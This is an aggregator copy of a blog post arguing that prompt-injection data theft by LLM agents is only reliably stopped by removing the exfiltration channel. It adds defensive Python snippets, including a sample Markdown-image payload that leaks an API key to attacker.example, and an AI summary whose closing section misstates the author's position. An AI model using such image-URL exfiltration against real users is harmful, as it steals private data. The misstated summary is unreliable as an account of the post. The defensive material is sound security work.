Source URL: https://simonwillison.net/2025/Sep/26/how-to-stop-ais-lethal-trifecta/
Source: Simon Willison’s Weblog
Title: How to stop AI’s “lethal trifecta”
Feedly Summary: How to stop AI’s “lethal trifecta”
This is the second mention of the lethal trifecta in the Economist in just the last week! Their earlier coverage was “Why AI systems may never be secure”, published on September 22nd – I wrote about that here, where I called it “the clearest explanation yet I’ve seen of these problems in a mainstream publication”.
I like this new article a lot less.
It makes an argument that I mostly agree with: building software on top of LLMs is more like traditional physical engineering than conventional software development – since LLMs are non-deterministic we need to think in terms of tolerances and redundancy:
The great works of Victorian England were erected by engineers who could not be sure of the properties of the materials they were using. In particular, whether by incompetence or malfeasance, the iron of the period was often not up to snuff. As a consequence, engineers erred on the side of caution, overbuilding to incorporate redundancy into their creations. The result was a series of centuries-spanning masterpieces.
AI-security providers do not think like this. Conventional coding is a deterministic practice. Security vulnerabilities are seen as errors to be fixed, and when fixed, they go away. AI engineers, inculcated in this way of thinking from their schooldays, therefore often act as if problems can be solved just with more training data and more astute system prompts.
My problem with the article is that I don’t think this approach is appropriate when it comes to security!
As I’ve said several times before, in application security 99% is a failing grade. If there’s a 1% chance of an attack getting through, an adversarial attacker will find that attack.
The whole point of the lethal trifecta framing is that the only way to reliably prevent that class of attacks is to cut off one of the three legs!
Generally the easiest leg to remove is the exfiltration vectors – the ability for the LLM agent to transmit stolen data back to the attacker.
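As a rough illustration of what removing a leg can look like in practice, here is a minimal sketch of a configuration check that refuses to run an agent combining all three legs. This is an illustration only, not code from the post or the Economist article; the `AgentConfig` structure and the tool names are hypothetical, and a real system would classify capabilities rather than match on names.

```python
# Minimal sketch (hypothetical names): refuse to run an agent whose
# configuration combines all three legs of the lethal trifecta -
# private data, untrusted content, and any tool that can send data out.

from dataclasses import dataclass, field

# Hypothetical labels for tools that can transmit data to an attacker.
EXFILTRATION_TOOLS = {"http_fetch", "send_email", "render_remote_image"}

@dataclass
class AgentConfig:
    reads_private_data: bool           # e.g. can read email, files, secrets
    processes_untrusted_content: bool  # e.g. summarises web pages or inbound mail
    tools: set[str] = field(default_factory=set)

def check_lethal_trifecta(config: AgentConfig) -> None:
    """Raise if all three legs of the lethal trifecta are present."""
    exfil = config.tools & EXFILTRATION_TOOLS
    if config.reads_private_data and config.processes_untrusted_content and exfil:
        raise ValueError(
            "Lethal trifecta present: remove private-data access, untrusted input, "
            f"or the exfiltration-capable tools {sorted(exfil)}"
        )

# This config is rejected until http_fetch is dropped.
risky = AgentConfig(True, True, {"search_notes", "http_fetch"})
try:
    check_lethal_trifecta(risky)
except ValueError as err:
    print(err)

safe = AgentConfig(True, True, {"search_notes"})
check_lethal_trifecta(safe)  # passes: no way to transmit stolen data out
```

The check is deliberately binary: rather than trying to estimate how likely an injection is to succeed, it removes one enabling condition entirely, so the attack class is eliminated rather than merely made less probable.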
Via Hacker News
Tags: security, ai, prompt-injection, generative-ai, llms, exfiltration-attacks, lethal-trifecta
AI Summary and Description: Yes
Summary: The text discusses the security challenges of building systems on top of large language models (LLMs). It contrasts the conventional software-engineering mindset, in which vulnerabilities are bugs that stay fixed once patched, with a more cautious approach modelled on traditional physical engineering and its reliance on tolerances and redundancy. It then argues that for security even that is not enough: the only reliable defence against the “lethal trifecta” class of attacks is to remove one of the enabling conditions, most practically the exfiltration vector.
Detailed Description:
The article provides insight into the current discourse around AI security, particularly the concept of the “lethal trifecta”: three conditions that together enable data-stealing attacks on AI systems. Here’s a breakdown of the significant points made in the text:
– **Lethal Trifecta Introduction**:
– The term “lethal trifecta” refers to three conditions that, when present together in a single agent, enable data-stealing attacks: access to private data, exposure to untrusted content, and the ability to communicate externally (i.e. to exfiltrate data). The excerpt does not spell all three out, but its focus is squarely on the exfiltration leg.
– **Non-deterministic Nature of LLMs**:
– LLMs are described as non-deterministic, which means their outputs can vary despite identical inputs. This raises a critical security challenge as it complicates the predictability and reliability of system behavior.
– **Comparison to Traditional Engineering**:
– The author draws a parallel between AI engineering and traditional physical engineering practices, suggesting that, much like engineers of the Victorian era who built with the uncertainty of material properties, AI engineers should adopt a mindset that incorporates redundancy and tolerances to safeguard against vulnerabilities.
– **Critique of Conventional AI Security Approaches**:
– The text argues that conventional AI security practices lack the necessary rigor. Unlike traditional coding, where bugs can be systematically fixed, vulnerabilities in AI models don’t necessarily disappear with training or improved prompts.
– **Limits of Probabilistic Defences**:
– The author argues that the tolerance-and-redundancy mindset, while sensible for reliability, is not sufficient for security: even a 1% chance of a successful attack is unacceptable, because an adversarial attacker will keep probing until that 1% is found.
– **Focus on Exfiltration**:
– The article argues that cutting off exfiltration vectors is usually the most practical way to break the lethal trifecta: if the LLM agent has no channel through which to transmit stolen data back to an attacker, a successful prompt injection cannot leak it. A minimal sketch of one such measure follows this list.
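As one concrete example of closing an exfiltration channel (an illustrative sketch, not a mechanism described in the article): a well-known vector is Markdown image rendering, where a prompt-injected response embeds stolen data in an image URL that the client then requests from an attacker’s server. A simple mitigation is to strip such images from model output before rendering:

```python
# Illustrative sketch: strip Markdown images from LLM output before rendering,
# since image URLs can smuggle stolen data out in their query strings.
# This closes one exfiltration channel; it is not a complete defence.

import re

# Matches Markdown image syntax, e.g. ![alt](https://attacker.example/?leak=SECRET)
MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")

def strip_images(llm_output: str) -> str:
    """Replace every Markdown image in the model's output with a placeholder."""
    return MARKDOWN_IMAGE.sub("[image removed]", llm_output)

injected = "Done. ![status](https://attacker.example/log?data=API_KEY_VALUE)"
print(strip_images(injected))  # -> "Done. [image removed]"
```

Real deployments tend to go further, for example only rendering images from an allow-listed set of domains, but the principle is the same: remove the channel rather than try to detect every malicious prompt.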
Key Implications for Security Professionals:
– The text underscores the need for a paradigm shift in how AI security is approached, advocating for a more comprehensive risk management and mitigation strategy that acknowledges the unique challenges posed by LLMs.
– Security professionals in the AI domain should consider integrating principles from traditional engineering that emphasize redundancy and risk reduction into their practices.
– Developing robust security postures that proactively address vulnerabilities in AI systems, especially those relating to data exfiltration, is critical in safeguarding against adversarial threats.
This analysis encourages professionals to rethink existing security paradigms and adapt new methodologies to improve LLM security, ultimately pushing for a stronger defense strategy against evolving threats in the AI landscape.